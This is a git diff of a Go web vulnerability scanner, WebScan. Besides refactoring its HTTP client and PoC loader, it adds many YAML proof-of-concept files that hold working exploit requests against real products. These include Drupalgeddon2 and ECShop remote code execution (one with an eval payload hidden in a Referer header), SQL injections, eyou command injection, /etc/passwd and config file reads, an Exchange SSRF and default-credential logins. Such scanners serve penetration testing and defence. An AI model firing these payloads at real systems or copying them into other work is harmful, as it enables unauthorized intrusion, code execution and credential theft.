"crypto/md5"
"encoding/base64"
"fmt"
@@ -11,10 +12,13 @@ import (
"github.com/google/cel-go/common/types/ref"
"github.com/google/cel-go/interpreter/functions"
exprpb "google.golang.org/genproto/googleapis/api/expr/v1alpha1"
"io"
"io/ioutil"
"math/rand"
"net/http"
"net/url"
"regexp"
"strconv"
"strings"
"time"
)
@@ -26,19 +30,19 @@ func NewEnv(c *CustomLib) (*cel.Env, error) {
func Evaluate(env *cel.Env, expression string, params map[string]interface{}) (ref.Val, error) {
ast, iss := env.Compile(expression)
if iss.Err() != nil {
//fmt.Println("compile: ", iss.Err())
//fmt.Printf("compile: ", iss.Err())
return nil, iss.Err()
}
prg, err := env.Program(ast)
if err != nil {
//fmt.Println("Program creation error: %v", err)
//fmt.Printf("Program creation error: %v", err)
return nil, err
}
out, _, err := prg.Eval(params)
if err != nil {
//fmt.Println("Evaluation error: %v", err)
//fmt.Printf("Evaluation error: %v", err)
return nil, err
}
return out, nil
@@ -123,6 +127,10 @@ func NewEnvOption() CustomLib {
decls.NewOverload("randomLowercase_int",
[]*exprpb.Type{decls.Int},
decls.String)),
decls.NewFunction("randomUppercase",
decls.NewOverload("randomUppercase_int",
[]*exprpb.Type{decls.Int},
decls.String)),
decls.NewFunction("base64",
decls.NewOverload("base64_string",
[]*exprpb.Type{decls.String},
@@ -186,7 +194,7 @@ func NewEnvOption() CustomLib {
},
},
&functions.Overload{
Operator: "string_bmatch_bytes",
Operator: "string_bmatches_bytes",
Binary: func(lhs ref.Val, rhs ref.Val) ref.Val {
v1, ok := lhs.(types.String)
if !ok {
@@ -238,6 +246,16 @@ func NewEnvOption() CustomLib {
return types.String(randomLowercase(int(n)))
},
},
&functions.Overload{
Operator: "randomUppercase_int",
Unary: func(value ref.Val) ref.Val {
n, ok := value.(types.Int)
if !ok {
return types.ValOrErr(value, "unexpected type '%v' passed to randomUppercase", value.Type())
}
return types.String(randomUppercase(int(n)))
},
},
&functions.Overload{
Operator: "base64_string",
Unary: func(value ref.Val) ref.Val {
@@ -419,9 +437,15 @@ func (c *CustomLib) UpdateCompileOptions(args map[string]string) {
}
}
var randSource = rand.New(rand.NewSource(time.Now().Unix()))
func randomLowercase(n int) string {
lowercase := "abcdefghijklmnopqrstuvwxyz"
randSource := rand.New(rand.NewSource(time.Now().Unix()))
return RandomStr(randSource, lowercase, n)
}
func randomUppercase(n int) string {
lowercase := "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
return RandomStr(randSource, lowercase, n)
}
@@ -445,7 +469,6 @@ func reverseCheck(r *Reverse, timeout int64) bool {
return false
}
func RandomStr(randSource *rand.Rand, letterBytes string, n int) string {
const (
letterIdxBits = 6 // 6 bits to represent a letter index
@@ -467,3 +490,114 @@ func RandomStr(randSource *rand.Rand, letterBytes string, n int) string {
}
return string(randBytes)
}
func DoRequest(req *http.Request, redirect bool) (*Response, error) {
if req.Body == nil || req.Body == http.NoBody {
} else {
req.Header.Set("Content-Length", strconv.Itoa(int(req.ContentLength)))
if req.Header.Get("Content-Type") == "" {
req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
}
}
var oResp *http.Response
var err error
if redirect {
oResp, err = Client.Do(req)
} else {
oResp, err = ClientNoRedirect.Do(req)
}
if err != nil {
return nil, err
}
defer oResp.Body.Close()
resp, err := ParseResponse(oResp)
if err != nil {
return nil, err
}
return resp, err
}
func ParseUrl(u *url.URL) *UrlType {
nu := &UrlType{}
nu.Scheme = u.Scheme
nu.Domain = u.Hostname()
nu.Host = u.Host
nu.Port = u.Port()
nu.Path = u.EscapedPath()
nu.Query = u.RawQuery
nu.Fragment = u.Fragment
return nu
}
func ParseRequest(oReq *http.Request) (*Request, error) {
req := &Request{}
req.Method = oReq.Method
req.Url = ParseUrl(oReq.URL)
header := make(map[string]string)
for k := range oReq.Header {
header[k] = oReq.Header.Get(k)
}
req.Headers = header
req.ContentType = oReq.Header.Get("Content-Type")
if oReq.Body == nil || oReq.Body == http.NoBody {
} else {
data, err := ioutil.ReadAll(oReq.Body)
if err != nil {
return nil, err
}
req.Body = data
oReq.Body = ioutil.NopCloser(bytes.NewBuffer(data))
}
return req, nil
}
func ParseResponse(oResp *http.Response) (*Response, error) {
var resp Response
header := make(map[string]string)
resp.Status = int32(oResp.StatusCode)
resp.Url = ParseUrl(oResp.Request.URL)
for k := range oResp.Header {
header[k] = oResp.Header.Get(k)
}
resp.Headers = header
resp.ContentType = oResp.Header.Get("Content-Type")
body, err := getRespBody(oResp)
if err != nil {
return nil, err
}
resp.Body = body
return &resp, nil
}
func getRespBody(oResp *http.Response) ([]byte, error) {
var body []byte
if oResp.Header.Get("Content-Encoding") == "gzip" {
gr, err := gzip.NewReader(oResp.Body)
if err != nil {
return nil, err
}
defer gr.Close()
for {
buf := make([]byte, 1024)
n, err := gr.Read(buf)
if err != nil && err != io.EOF {
//utils.Logger.Error(err)
return nil, err
}
if n == 0 {
break
}
body = append(body, buf...)
}
} else {
raw, err := ioutil.ReadAll(oResp.Body)
if err != nil {
//utils.Logger.Error(err)
return nil, err
}
defer oResp.Body.Close()
body = raw
}
return body, nil
}

171
WebScan/lib/http.go
View File

@@ -1,171 +0,0 @@
package lib
import (
"bytes"
"compress/gzip"
"crypto/tls"
"io"
"io/ioutil"
"net"
"net/http"
"net/url"
"strconv"
"time"
)
var (
client *http.Client
clientNoRedirect *http.Client
dialTimout = 5 * time.Second
keepAlive = 15 * time.Second
)
func InitHttpClient(ThreadsNum int, DownProxy string, Timeout time.Duration) error {
dialer := &net.Dialer{
Timeout: dialTimout,
KeepAlive: keepAlive,
}
tr := &http.Transport{
DialContext: dialer.DialContext,
//MaxConnsPerHost: 0,
MaxIdleConns: 1000,
MaxIdleConnsPerHost: ThreadsNum * 2,
IdleConnTimeout: keepAlive,
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
TLSHandshakeTimeout: 5 * time.Second,
DisableKeepAlives: false,
}
if DownProxy != "" {
u, err := url.Parse(DownProxy)
if err != nil {
return err
}
tr.Proxy = http.ProxyURL(u)
}
client = &http.Client{
Transport: tr,
Timeout: Timeout,
}
clientNoRedirect = &http.Client{
Transport: tr,
Timeout: Timeout,
}
clientNoRedirect.CheckRedirect = func(req *http.Request, via []*http.Request) error {
return http.ErrUseLastResponse
}
return nil
}
func DoRequest(req *http.Request, redirect bool) (*Response, error) {
if req.Body == nil || req.Body == http.NoBody {
} else {
req.Header.Set("Content-Length", strconv.Itoa(int(req.ContentLength)))
if req.Header.Get("Content-Type") == "" {
req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
}
}
var oResp *http.Response
var err error
if redirect {
oResp, err = client.Do(req)
} else {
oResp, err = clientNoRedirect.Do(req)
}
if err != nil {
return nil, err
}
defer oResp.Body.Close()
resp, err := ParseResponse(oResp)
if err != nil {
return nil, err
}
return resp, err
}
func ParseUrl(u *url.URL) *UrlType {
nu := &UrlType{}
nu.Scheme = u.Scheme
nu.Domain = u.Hostname()
nu.Host = u.Host
nu.Port = u.Port()
nu.Path = u.EscapedPath()
nu.Query = u.RawQuery
nu.Fragment = u.Fragment
return nu
}
func ParseRequest(oReq *http.Request) (*Request, error) {
req := &Request{}
req.Method = oReq.Method
req.Url = ParseUrl(oReq.URL)
header := make(map[string]string)
for k := range oReq.Header {
header[k] = oReq.Header.Get(k)
}
req.Headers = header
req.ContentType = oReq.Header.Get("Content-Type")
if oReq.Body == nil || oReq.Body == http.NoBody {
} else {
data, err := ioutil.ReadAll(oReq.Body)
if err != nil {
return nil, err
}
req.Body = data
oReq.Body = ioutil.NopCloser(bytes.NewBuffer(data))
}
return req, nil
}
func ParseResponse(oResp *http.Response) (*Response, error) {
var resp Response
header := make(map[string]string)
resp.Status = int32(oResp.StatusCode)
resp.Url = ParseUrl(oResp.Request.URL)
for k := range oResp.Header {
header[k] = oResp.Header.Get(k)
}
resp.Headers = header
resp.ContentType = oResp.Header.Get("Content-Type")
body, err := getRespBody(oResp)
if err != nil {
return nil, err
}
resp.Body = body
return &resp, nil
}
func getRespBody(oResp *http.Response) ([]byte, error) {
var body []byte
if oResp.Header.Get("Content-Encoding") == "gzip" {
gr, err := gzip.NewReader(oResp.Body)
if err != nil {
return nil, err
}
defer gr.Close()
for {
buf := make([]byte, 1024)
n, err := gr.Read(buf)
if err != nil && err != io.EOF {
//utils.Logger.Error(err)
return nil, err
}
if n == 0 {
break
}
body = append(body, buf...)
}
} else {
raw, err := ioutil.ReadAll(oResp.Body)
if err != nil {
//utils.Logger.Error(err)
return nil, err
}
defer oResp.Body.Close()
body = raw
}
return body, nil
}

66
WebScan/lib/http.pb.go
View File

@@ -4,9 +4,12 @@
package lib
import (
"embed"
fmt "fmt"
proto "github.com/golang/protobuf/proto"
"gopkg.in/yaml.v3"
math "math"
"strings"
)
// Reference imports to suppress errors if they are not otherwise used.
@@ -352,3 +355,66 @@ var fileDescriptor_11b04836674e6f94 = []byte{
0x0d, 0x67, 0xef, 0xf5, 0x80, 0x1f, 0x38, 0xa9, 0x37, 0xfc, 0x5b, 0xdc, 0xfe, 0x0a, 0x00, 0x00,
0xff, 0xff, 0x2a, 0xe0, 0x6d, 0x45, 0x24, 0x03, 0x00, 0x00,
}
type Poc struct {
Name string `yaml:"name"`
Set map[string]string `yaml:"set"`
Sets map[string][]string `yaml:"sets"`
Rules []Rules `yaml:"rules"`
Detail Detail `yaml:"detail"`
}
type Rules struct {
Method string `yaml:"method"`
Path string `yaml:"path"`
Headers map[string]string `yaml:"headers"`
Body string `yaml:"body"`
Search string `yaml:"search"`
FollowRedirects bool `yaml:"follow_redirects"`
Expression string `yaml:"expression"`
}
type Detail struct {
Author string `yaml:"author"`
Links []string `yaml:"links"`
Description string `yaml:"description"`
Version string `yaml:"version"`
}
func LoadMultiPoc(Pocs embed.FS, pocname string) []*Poc {
var pocs []*Poc
for _, f := range SelectPoc(Pocs, pocname) {
if p, err := loadPoc(f, Pocs); err == nil {
pocs = append(pocs, p)
}
}
return pocs
}
func loadPoc(fileName string, Pocs embed.FS) (*Poc, error) {
p := &Poc{}
yamlFile, err := Pocs.ReadFile("pocs/" + fileName)
if err != nil {
return nil, err
}
err = yaml.Unmarshal(yamlFile, p)
if err != nil {
return nil, err
}
return p, err
}
func SelectPoc(Pocs embed.FS, pocname string) []string {
entries, err := Pocs.ReadDir("pocs")
if err != nil {
fmt.Println(err)
}
var foundFiles []string
for _, entry := range entries {
if strings.Contains(entry.Name(), pocname) {
foundFiles = append(foundFiles, entry.Name())
}
}
return foundFiles
}

70
WebScan/lib/poc.go
View File

@@ -1,70 +0,0 @@
package lib
import (
"embed"
"fmt"
"gopkg.in/yaml.v3"
"strings"
)
type Poc struct {
Name string `yaml:"name"`
Set map[string]string `yaml:"set"`
Rules []Rules `yaml:"rules"`
Detail Detail `yaml:"detail"`
}
type Rules struct {
Method string `yaml:"method"`
Path string `yaml:"path"`
Headers map[string]string `yaml:"headers"`
Body string `yaml:"body"`
Search string `yaml:"search"`
FollowRedirects bool `yaml:"follow_redirects"`
Expression string `yaml:"expression"`
}
type Detail struct {
Author string `yaml:"author"`
Links []string `yaml:"links"`
Description string `yaml:"description"`
Version string `yaml:"version"`
}
func LoadMultiPoc(Pocs embed.FS, pocname string) []*Poc {
var pocs []*Poc
for _, f := range SelectPoc(Pocs, pocname) {
if p, err := loadPoc(f, Pocs); err == nil {
pocs = append(pocs, p)
}
}
return pocs
}
func loadPoc(fileName string, Pocs embed.FS) (*Poc, error) {
p := &Poc{}
yamlFile, err := Pocs.ReadFile("pocs/" + fileName)
if err != nil {
return nil, err
}
err = yaml.Unmarshal(yamlFile, p)
if err != nil {
return nil, err
}
return p, err
}
func SelectPoc(Pocs embed.FS, pocname string) []string {
entries, err := Pocs.ReadDir("pocs")
if err != nil {
fmt.Println(err)
}
var foundFiles []string
for _, entry := range entries {
if strings.Contains(entry.Name(), pocname) {
foundFiles = append(foundFiles, entry.Name())
}
}
return foundFiles
}

16
WebScan/pocs/activemq-default-password.yml Normal file
View File

@@ -0,0 +1,16 @@
name: poc-yaml-activemq-default-password
rules:
- method: GET
path: /admin/
expression: |
response.status == 401 && response.body.bcontains(b"Unauthorized")
- method: GET
path: /admin/
headers:
Authorization: Basic YWRtaW46YWRtaW4=
expression: |
response.status == 200 && response.body.bcontains(b"Welcome to the Apache ActiveMQ Console of") && response.body.bcontains(b"<h2>Broker</h2>")
detail:
author: pa55w0rd(www.pa55w0rd.online/)
links:
- https://blog.csdn.net/ge00111/article/details/72765210

12
WebScan/pocs/alibaba-canal-info-leak.yml Normal file
View File

@@ -0,0 +1,12 @@
name: poc-yaml-alibaba-canal-info-leak
rules:
- method: GET
path: /api/v1/canal/config/1/1
follow_redirects: false
expression: |
response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"ncanal.aliyun.accessKey") && response.body.bcontains(b"ncanal.aliyun.secretKey")
detail:
author: Aquilao(https://github.com/Aquilao)
info: alibaba Canal info leak
links:
- https://my.oschina.net/u/4581879/blog/4753320

15
WebScan/pocs/alibaba-nacos-api-unauth.yml Normal file
View File

@@ -0,0 +1,15 @@
name: poc-yaml-alibaba-nacos-api-unauth
rules:
- method: GET
path: /nacos/v1/auth/users?pageNo=1&pageSize=9
headers:
User-Agent: Nacos-Server
follow_redirects: true
expression: |
response.content_type.contains("application/json") && response.body.bcontains(bytes("totalCount")) && response.body.bcontains(bytes("pagesAvailable")) && response.body.bcontains(bytes("username")) && response.body.bcontains(bytes("password"))
detail:
author: AgeloVito
info: alibaba-nacos-api-unauth
login: nacos/nacos
links:
- https://blog.csdn.net/caiqiiqi/article/details/112005424

13
WebScan/pocs/alibaba-nacos.yml Normal file
View File

@@ -0,0 +1,13 @@
name: poc-yaml-alibaba-nacos
rules:
- method: GET
path: /nacos/
follow_redirects: true
expression: |
response.body.bcontains(bytes("<title>Nacos</title>"))
detail:
author: AgeloVito
info: alibaba-nacos
login: nacos/nacos
links:
- https://blog.csdn.net/caiqiiqi/article/details/112005424

21
WebScan/pocs/apache-solr-file-read.yml Normal file
View File

@@ -0,0 +1,21 @@
name: poc-yaml-apache-solr-file-read
rules:
- method: GET
path: "/solr/admin/cores?indexInfo=false&wt=json"
search: |
"name":"(?P<core_name>.+?)",
expression:
response.status == 200
- method: POST
path: "/solr/{{core_name}}/config"
headers:
Content-type: application/json
body: |
{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
expression: |
response.status == 200 && response.body.bcontains(b"This")
detail:
author: flyinbed
links:
- "https://mp.weixin.qq.com/s/iX2OasjynZ0MAvNTvIcmjg"
- "https://mp.weixin.qq.com/s/HMtAz6_unM1PrjfAzfwCUQ"

12
WebScan/pocs/dlink-cve-2020-25078-account-disclosure.yml Normal file
View File

@@ -0,0 +1,12 @@
name: poc-yaml-dlink-cve-2020-25078-account-disclosure
rules:
- method: GET
path: >-
/config/getuser?index=0
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=") && response.headers["Content-Type"].contains("text/plain")
detail:
author: kzaopa(https://github.com/kzaopa)
links:
- https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg

9
WebScan/pocs/dlink-dcs-info-leak.yml Normal file
View File

@@ -0,0 +1,9 @@
name: poc-yaml-dlink-dcs-info-leak
rules:
- method: GET
path: /config/getuser?index=0
expression: response.status == 200 && response.body.bcontains(b"name=") && response.body.bcontains(b"pass=") && response.body.bcontains(b"priv=")
detail:
author: jingling(https://github.com/shmilylty)
links:
- https://mp.weixin.qq.com/s/cG868wc7dmwxFslcwlgDpw

14
WebScan/pocs/drupal-cve-2014-3704-sqli.yml Normal file
View File

@@ -0,0 +1,14 @@
name: poc-yaml-drupal-cve-2014-3704-sqli
rules:
- method: POST
path: /?q=node&destination=node
body: >-
pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or
updatexml(0x23,concat(1,md5(666)),1)%23]=bob&name[0]=a
follow_redirects: false
expression: |
response.status == 500 && response.body.bcontains(b"PDOException") && response.body.bcontains(b"fae0b27c451c728867a567e8c1bb4e53")
detail:
Affected Version: "Drupal < 7.32"
links:
- https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2014-3704

19
WebScan/pocs/drupal-cve-2018-7600-rce.yml Normal file
View File

@@ -0,0 +1,19 @@
name: poc-yaml-drupal-cve-2018-7600-rce
set:
r1: randomLowercase(4)
r2: randomLowercase(4)
rules:
- method: POST
path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}}
expression: |
response.body.bcontains(bytes(r1 + "%" + r2))
detail:
links:
- https://github.com/dreadlocked/Drupalgeddon2
- https://paper.seebug.org/567/
test:
target: http://cve-2018-7600-8-x.vulnet:8080/

29
WebScan/pocs/drupal-cve-2018-7600-rce2.yml Normal file
View File

@@ -0,0 +1,29 @@
name: poc-yaml-drupal-cve-2018-7600-rce
set:
r1: randomLowercase(4)
r2: randomLowercase(4)
rules:
- method: POST
path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password
search: |
name="form_build_id"\s+value="(?P<build_id>.+?)"
expression: |
response.status == 200
- method: POST
path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_build_id={{build_id}}
expression: |
response.body.bcontains(bytes(r1 + "%" + r2))
detail:
links:
- https://github.com/dreadlocked/Drupalgeddon2
- https://paper.seebug.org/567/
test:
target: http://cve-2018-7600-8-x.vulnet:8080/

13
WebScan/pocs/ecology-sqli.yml Normal file
View File

@@ -0,0 +1,13 @@
name: poc-yaml-ecology-sqli
set:
rand: randomInt(200000000, 210000000)
rules:
- method: GET
path: /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20md5({{rand}})%20as%20id%20from%20HrmResourceManager
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
detail:
author: whami-root(https://github.com/whami-root)
links:
- https://github.com/whami-root

17
WebScan/pocs/ecology-validate-sqli.yml Normal file
View File

@@ -0,0 +1,17 @@
name: poc-yaml-ecology-validate-sqli
set:
r1: randomInt(8000, 9999)
r2: randomInt(800, 1000)
rules:
- method: POST
path: /cpt/manage/validate.jsp?sourcestring=validateNum
body: >-
sourcestring=validateNum&capitalid=11%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion+select+str({{r1}}*{{r2}})&capitalnum=-10
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: fuping
links:
- https://news.ssssafe.com/archives/3325
- https://www.weaver.com.cn/cs/securityDownload.asp

20
WebScan/pocs/ecology-workflowservicexml-2.yml Normal file
View File

File diff suppressed because one or more lines are too long

20
WebScan/pocs/ecology-workflowservicexml.yml Normal file
View File

File diff suppressed because one or more lines are too long

13
WebScan/pocs/ecshop-cnvd-2020-58823-sqli.yml Normal file
View File

@@ -0,0 +1,13 @@
name: poc-yaml-ecshop-cnvd-2020-58823-sqli
set:
r1: randomInt(40000, 44800)
rules:
- method: POST
path: /delete_cart_goods.php
body: id=0||(updatexml(1,concat(0x7e,(select%20md5({{r1}})),0x7e),1))
expression: |
response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31)))
detail:
author: 凉风(http://webkiller.cn/)
links:
- https://mp.weixin.qq.com/s/1t0uglZNoZERMQpXVVjIPw

17
WebScan/pocs/ecshop-rce.yml Normal file
View File

@@ -0,0 +1,17 @@
name: poc-yaml-ecshop-rce
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
- method: POST
path: /user.php
headers:
Referer: >-
554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
Content-Type: application/x-www-form-urlencoded
body: action=login&pp123=printf({{r1}}*{{r2}});
expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: 凉风(http://webkiller.cn/)
links:
- https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md

17
WebScan/pocs/ecshop-rce2.yml Normal file
View File

@@ -0,0 +1,17 @@
name: poc-yaml-ecshop-rce
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
- method: POST
path: /user.php
headers:
Referer: >-
45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953aads
Content-Type: application/x-www-form-urlencoded
body: action=login&pp123=printf({{r1}}*{{r2}});
expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: 凉风(http://webkiller.cn/)
links:
- https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md

14
WebScan/pocs/exchange-cve-2021-26855-ssrf.yml Normal file
View File

@@ -0,0 +1,14 @@
name: poc-yaml-exchange-cve-2021-26855-ssrf
rules:
- method: GET
path: /owa/auth/x.js
headers:
Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
follow_redirects: false
expression: |
"X-CalculatedBETarget" in response.headers && response.headers["X-CalculatedBETarget"].icontains("localhost")
detail:
author: sharecast
Affected Version: "Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010"
links:
- https://github.com/microsoft/CSS-Exchange/blob/main/Security/http-vuln-cve2021-26855.nse

15
WebScan/pocs/eyou-rce.yml Normal file
View File

@@ -0,0 +1,15 @@
name: poc-yaml-eyou-rce
set:
r1: randomInt(800000000, 1000000000)
r2: randomInt(800000000, 1000000000)
rules:
- method: POST
path: /webadm/?q=moni_detail.do&action=gragh
headers:
Content-Type: application/x-www-form-urlencoded
body: type='|expr {{r1}} + {{r2}}||'
expression: response.body.bcontains(bytes(string(r1 + r2)))
detail:
author: jingling(https://github.com/shmilylty)
links:
- https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g

11
WebScan/pocs/finereport-v8-arbitrary-file-read.yml Normal file
View File

@@ -0,0 +1,11 @@
name: poc-yaml-finereport-v8-arbitrary-file-read
rules:
- method: GET
path: /WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"rootManagerName") && response.body.bcontains(b"CDATA")
detail:
author: Facker007(https://github.com/Facker007)
links:
- http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%20v8.0%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CNVD-2018-04757.html?h=%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8

11
WebScan/pocs/flir-ax8-file-read.yml Normal file
View File

@@ -0,0 +1,11 @@
name: poc-yaml-flir-ax8-file-read
rules:
- method: GET
path: "/download.php?file=/etc/passwd"
follow_redirects: false
expression: |
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
detail:
author: Print1n(http://print1n.top)
links:
- https://juejin.cn/post/6961370156484263972

15
WebScan/pocs/gitlab-cnvd-2021-14193-infoleak.yml Normal file
View File

@@ -0,0 +1,15 @@
name: poc-yaml-gitlab-cnvd-2021-14193-infoleak
rules:
- method: POST
path: /api/graphql
headers:
Content-Type: application/json
body: >-
{"query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }","variables":null,"operationName":null}
follow_redirects: false
expression: response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(bytes("avatarUrl"))
detail:
author: 说书人(http://python.vin/)
links:
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-14193
- https://gitlab.com/gitlab-org/gitlab/-/issues/244275

10
WebScan/pocs/h3c-secparh-any-user-login.yml Normal file
View File

@@ -0,0 +1,10 @@
name: poc-yaml-h3c-secparh-any-user-login
rules:
- method: GET
path: "/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin"
expression: |
response.status == 200 && ("错误的id".bmatches(response.body) || "审计管理员".bmatches(response.body))
detail:
author: Print1n(https://print1n.top)
links:
